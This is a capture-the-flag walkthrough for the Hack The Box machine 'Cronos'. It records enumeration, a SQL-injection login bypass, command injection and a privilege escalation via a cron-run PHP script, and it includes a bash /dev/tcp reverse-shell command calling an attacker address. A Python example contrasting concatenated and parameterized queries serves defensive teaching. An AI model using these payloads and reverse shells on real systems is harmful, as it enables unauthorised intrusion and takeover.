Hack The Box (HTB) Writeup - Cronos

Today we will solve Cronos, a Medium difficulty box from Hack The Box (HTB). If you are new, HTB is an online practice lab for learning penetration testing. This box is helpful when preparing for the OSCP certification.

Summary:

  • Run Nmap to find open ports and services
  • Enumerate DNS
  • Add the IP and identified hostnames to /etc/hosts
  • Enumerate HTTP
  • Identify login on admin.cronos.htb
  • Use SQL Injection to bypass login
  • Check for Command Injection
  • Reverse shell and locate user.txt flag
  • Transfer Linux privilege escalation scripts from the local machine to the low-privileged machine
  • Results
  • PHP reverse shell in crontab
  • Reverse shell and locate root.txt
source: hackthebox

Start with Nmap

Initial Scan

nmap 10.10.10.13

Run default scripts

nmap -sC -sV 10.10.10.13

Scan all ports

nmap -p- 10.10.10.13

Run UDP scan

nmap -sU 10.10.10.13

Use the dig command to request a DNS zone transfer (AXFR) and identify hostnames

dig axfr cronos.htb @10.10.10.13

Add the identified hostnames to /etc/hosts by using nano /etc/hosts

Open admin.cronos.htb in a browser

Try the SQL injection payloads from the link; login succeeds with the payload below

' or 1=1 limit 1 -- -+
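
Why this payload logs in, and why a parameterized query rejects it, shown as an added example (not code from the Cronos application or from this writeup). The login query shape, the users table and the use of SQLite in place of the box's database are assumptions made for illustration.

```python
import sqlite3

# Payload quoted in the writeup, submitted in the username field.
PAYLOAD = "' or 1=1 limit 1 -- -+"


def make_db():
    """Constructed in-memory user table standing in for the application's database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    # Constructed sample row; a real application stores a salted password hash.
    db.execute("INSERT INTO users (username, password) VALUES ('admin', 'constructed-hash')")
    return db


def build_vulnerable_query(username, password):
    # Hypothetical login query: user input is concatenated into the SQL text.
    return ("SELECT id FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


def login_vulnerable(db, username, password):
    # The quote in the payload closes the string literal, "or 1=1" makes the
    # WHERE clause true for every row, and "-- " comments out the password check.
    return db.execute(build_vulnerable_query(username, password)).fetchone() is not None


def login_parameterized(db, username, password):
    # Placeholders pass the input as data, so the payload is only ever compared
    # against the username column as a literal string.
    row = db.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query(PAYLOAD, "x"))
    print("concatenated query accepts payload:", login_vulnerable(db, PAYLOAD, "x"))
    print("parameterized query accepts payload:", login_parameterized(db, PAYLOAD, "x"))
    print("parameterized query accepts real user:",
          login_parameterized(db, "admin", "constructed-hash"))
```

The printed query shows the password condition ending up behind the comment marker, which is the part a code review or query log would reveal.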

Test for command injection by submitting the ls command. The output confirms that the web application is vulnerable to command injection.

Intercept the request in Burp Suite and use the command injection vulnerability to get a reverse shell.

bash -c 'bash -i /dev/tcp/10.10.14.16/8000 0>&1'

Got user.txt

Privilege escalation

Spawn a tty shell

python -c 'import pty; pty.spawn("/bin/sh")'

Run the commands below to identify the kernel and distribution of the box

uname -a
cat /proc/version
cat /etc/issue

Identify a privilege escalation script for Ubuntu 16.04.2. Download it to the local machine and then transfer it to the compromised machine.

Run the privilege escalation script

./linpeas.sh

Running the linpeas.sh script found /var/www/laravel/artisan

Check crontab

Download the php-reverse-shell.php script

Change the local IP and port number

To catch a reverse shell, set up nc and run the PHP script

Got a reverse shell

Got root.


Disclaimer: This tutorial is for educational purposes only. The individual is solely responsible for any illegal act.
